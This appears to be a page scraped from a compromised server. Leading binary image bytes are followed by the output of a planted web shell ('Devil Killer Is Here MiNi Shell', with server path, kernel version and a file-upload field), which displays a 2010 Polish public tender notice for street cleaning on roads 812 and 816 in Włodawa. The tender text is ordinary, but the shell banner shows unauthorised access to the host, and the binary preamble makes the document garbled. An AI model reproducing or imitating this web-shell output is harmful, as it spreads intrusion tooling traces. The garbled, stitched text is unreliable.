JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100301/44349-N-2010.html

<p class="kh_header"><b>Włodawa: Utrzymanie czystości w pasach drogowych dróg wojewódzkich nr 812 
 i 816 na terenie miasta Włodawa</b><br>
<b>Numer ogłoszenia: 44349 - 2010; data zamieszczenia: 01.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości w pasach drogowych dróg wojewódzkich nr 812 
 i 816 na terenie miasta Włodawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres usług obejmuje:
     ZADANIE NR 1.
1) Zamiatanie ulicy Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska  + drogi podporządkowane w granicach pasa drogowego (od km 60+130 do km 62+484)3531 m2 (dwukrotnie)
2) Koszenie traw i chwastów z ich zgrabieniem i usunięciem, grabienie i usunięcie liści  (Al. J. Piłsudskiego, ul. Rynek , ul. Okunińska ( od km 60+130 do km 62+440)
- 9267 m2 (czterokrotnie -w zależności od  potrzeb) 
3) Zbieranie śmieci z pasa drogowego z ich unieszkodliwieniem  Al. J. Piłsudskiego, ul. Rynek , ul. Okunińska ( od km 60+130 do km 62+440)	
(czternastokrotnie - średnio2 razy w m-cu)
4) Zamiatanie chodników wzdłuż ulic:
 Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska 
(od km 60+130 do km 62+440) -6957 m2 (dwukrotnie)
5) Zamiatanie chodnika i ścieżki rowerowej przy drodze Nr  812 od  ul. Światowida do m. na rz. Włodawka ( od km 76+528 do km 78+850 )- 8 040,40 m2 jednokrotnie
6) Opróżnianie koszy na śmiecie - 43 szt
- 5 szt. o poj.  40 l,
- 38 szt.  o poj. 60. l.  1 raz  w tygodniu (krotność 39)
       ZADANIE NR 2
1) Zamiatanie jezdni  - skrzyżowanie ul. Korolowska i ul. Chełmska - rondo + dojazd
- 2116 m2 (dwukrotnie)
2) Koszenie traw i chwastów z ich zgrabieniem i usunięciem: 
a) skrzyżowanie ulic Korolowska - Chełmska
    (rondo)
b) droga  816 km od km 59+200 : 60+129	
18 810 m2 (czterokrotnie - w zależności od potrzeb)
3) Zbieranie śmieci z pasa drogowego z ich unieszkodliwieniem  
a) ul. Korolowska i ul. Chełmska) od km 74+685 do km 77+240
b) droga nr 816 od km 59+200 do km 60+130 - czternastokrotnie (2 razy w m-cu)
4) Zamiatanie chodników  i ciągu pieszo rowerowego:
a) ul. Korolowska od skrzyż. z ul. Żołnierzy WiN 
    do skrzyż. z ul. Chełmską.  
b) ul. Chełmska od skrzyż z ul. Korolowską
    do skrzyż . z ul.Światowida	
- 6 524 m2 (dwukrotnie)
5) Zamiatanie chodnika i ścieżki rowerowej 
w m. Suszno droga woj. Nr 816 od  km 59+700 do km 60+129 -1 310 m2 (dwukrotnie)
6) Opróżnianie koszy na śmiecie - 2 szt. o poj. 60 l. 1 raz w tygodniu (krotność 39)
2. Wykonawca zabezpieczy we własnym zakresie i na swój koszt wszystkie
    niezbędne do realizacji zamówienia środki transportowe i sprzęt.
3. Sprzątanie należy wykonywać w godzinach o najmniejszym natężeniu ruchu.
4. Sprzątanie powinno odbywać się w sposób mechaniczny przy użyciu zamiatarki
    ulicznej lub w przypadku braku możliwości użycia zamiatarki ręcznie przy użyciu
    szczotek i łopat z załadunkiem zanieczyszczeń na środki  transportowe i 
    odwiezieniem we własnym zakresie na wysypisko śmieci.
5. Do obowiązków Wykonawcy należeć będzie:
a)	oczyszczenie jezdni na szerokości 0,75 m od każdej z dwóch krawędzi,
b)	oczyszczenie wlotów dróg podporządkowanych w granicach pasa drogowego,
c)	oczyszczenie chodników na całej szerokości,
d)	oczyszczenie nawierzchni parkingów oraz zatok autobusowych zlokalizowanych w granicach pasa drogowego, przy Al. J. Piłsudskiego,
e)	utrzymanie czystości na całej szerokości pasa drogowego,
f)	opróżnianie koszy na śmieci zlokalizowanych w pasie drogowym,
g)	koszenie traw i chwastów wraz z ich zgrabieniem i usunięciem, 
h)	grabienie liści i ich usunięcie,
i)	zagospodarowanie na własny koszt i we własnym zakresie zebranych  zanieczyszczeń. 
6.	Warunki realizacji zamówienia:
a)  decyzję o konieczności wykonywania poszczególnych usług objętych zamówieniem podejmować będzie Kierownik Rejonu Dróg Wojewódzkich  we Włodawie.
b)	wzywanie do pracy zespołów roboczych Wykonawcy odbywać się będzie telefonicznie przez upoważnionego pracownika Zamawiającego 
7. Zgodnie z art. 30 ust. 4 ustawy, Zamawiający  dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Prawo zamówień publicznych).
Szacunkowa wartość zamówienia: 64738.32 PLN netto wtym: Zadanie Nr 1 - 26607,48 PLN, Zadanie Nr 2 - 38130.84.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 90.51.13.00-5, 77.31.41.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dysponowania potencjałem technicznym zostanie spełniony, jeżeli Wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował przynajminiej: 1 zamiatarką uliczną, 2 kosiarki spalinowe, 2 kosy spalinowe na wysięgniku, 1 ciągnik z przyczepą lub samochód ciężarowy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto, oprócz oświadczeń lub dokumentów, które należy dołączyć w celu
     potwierdzenia spełniania warunków udziału w postępowaniu  Wykonawca obowiązany      jest dołączyć do oferty:
1)	Ofertę przetargową (z ceną brutto, netto i z podatkiem VAT) 
     wraz z załącznikiem do oferty (kosztorys ofertowy)
2)	Podpisany wzór umowy 
3)	W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy dołączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy   w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych;
4)	W przypadku podpisania oferty i innych dokumentów  przez osobę/osoby,  które nie są wymienione w odpisie z właściwego rejestru albo zaświadczeniu o wpisie do ewidencji działalności gospodarczej, do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 22-200 Włodawa, ul. Lubelska 60 pokój nr 2 w godz. 07:00 - 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2010 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 22-200 Włodawa, ul. Lubelska 60 pokój nr 15 (sekretariat).
Otwarcie ofert w dniu 09/03/2010 pokój nr 16 godz. 09:10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W niniejszym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie, faksem nr 82 572 17 93; 572 41 62 lub drogą elektroniczną na adres  e-mail: rdw.wlodawa@zdw.lublin.pl.
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej  niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się  z Wykonawcami:
1)	W sprawach technicznych - Krystyna Kowalewska (82 572 19 52)
2)	W sprawach formalno -prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Barbara Winiarczyk (82 572 16 35), Eugeniusz Kiewczykowski (82 572 16 35)
Wobec niezgodnej z przepisami ustawy czynności Zamawiającego podjętej w toku postępowania oraz w przypadku zaniechania przez Zamawiającego czynności do której jest obowiązany na podstawie ustawy, można wnieść odwołanie do Prezesa Izby, zgodnie z art. 180 Ustawy z dnia 29 stycznia 2004r Prawo zamówień publicznych (tekst jednolity Dz.U. z 2007r, Nr 223, poz. 1655 z późniejszymi zmianami).
Ponieważ wartość przedmiotowego zamówienia jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8, odwołanie przysługuje, zgodnie z art. 180 ust. 2 ustawy Pzp, wyłącznie wobec czynności:
1) opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu,
2) wykluczenia odwołującego z postępowania o udzielenie zamówienia,
3) odrzucenia oferty odwołującego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymaniu czystości w pasach drogowych dróg wojewódzkich nr 812 i 816 na terenie miasta Włodawa

Zadanie Nr1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) zamiatanie ulic: Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska + drogi podporządkowane w granicach pasa drogowego (od km 60+130 do km 62+484) - 3531 m2 (dwukrotnie)
2) Koszenie traw i chwastów z ich unieszkodliwieniem 
(Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska - od km 60+130 do km 62+440) - 9267 m2 czterokrotnie (w zależności od potrzeb) 
3) Zbieranie śmieci z pasa drogowego z ich unieszkodliwieniem (Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska - od km 60+130 do km 62+440) - czternastokrotnie 2 razy w m-cu,
4) Zamiatanie chodników wzdłuż ulic Al. J. piłsudskiego, ul. Rynek, ul. Okunińska od km 60+130 do km 62+440 - 6957 m2 dwukrotnie,
5) Zamiatanie chodnika i ścieżki rowerowej przy drodze nr 812 od ul. Światowida do mostu na rz. Włodawka od km 76+528 do km 78+850 - 8040,40 m2 jednokrotnie,
6) Opróżnianie koszy na śmiecie - 43 szt. w tym: 5 szt o poj. 40 l, 38 szt 
o poj. 60  l, 1 raz w tygodniu (krotność 39)
Szacunkowa wartość zadania 26607.28 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 90.51.13.00-5, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymaniu czystości w pasach drogowych dróg wojewódzkich nr 812 i 816 na terenie miasta Włodawa

Zadanie Nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zamiatanie jezdni  - skrzyżowanie ul. Korolowska i ul. Chełmska - rondo + dojazdy	2 116 m2 dwukrotnie
2) Koszenie traw i chwastów z ich zgrabieniem i usunięciem: 
a) skrzyżowanie ulic Korolowska - Chełmska (rondo)
b) droga  816 km od km 59+200 : 60+129	
18 810 m2 (czterokrotnie - w zależności od potrzeb)
3) Zbieranie śmieci z pasa drogowego z ich unieszkodliwieniem  
a) ul. Korolowska i ul. Chełmska) od km 74+685 do km 77+240
b) droga nr 816 od km 59+200 do km 60+130 - czternastokrotnie	
  średnio 2 razy w m-cu
4) Zamiatanie chodników  i ciągu pieszo rowerowego:
a) ul. Korolowska od skrzyż. z ul. Żołnierzy WiN do skrzyż. z ul. Chełmską.  
b) ul. Chełmska od skrzyż z ul. Korolowską do skrzyż . z ul.Światowida	
6 524 m2 - dwukrotnie
5) Zamiatanie chodnika i ścieżki rowerowej w m. Suszno droga woj. Nr 816 od  km 59+700 do km 60+129 -1310 m2 dwukrotnie
6) Opróżnianie koszy na śmiecie -2 szt. o poj. 60 l.- 1 raz w tygodniu (krotność 39)
Szacunkowa wartość zadania 38130.84 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 90.51.13.00-5, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com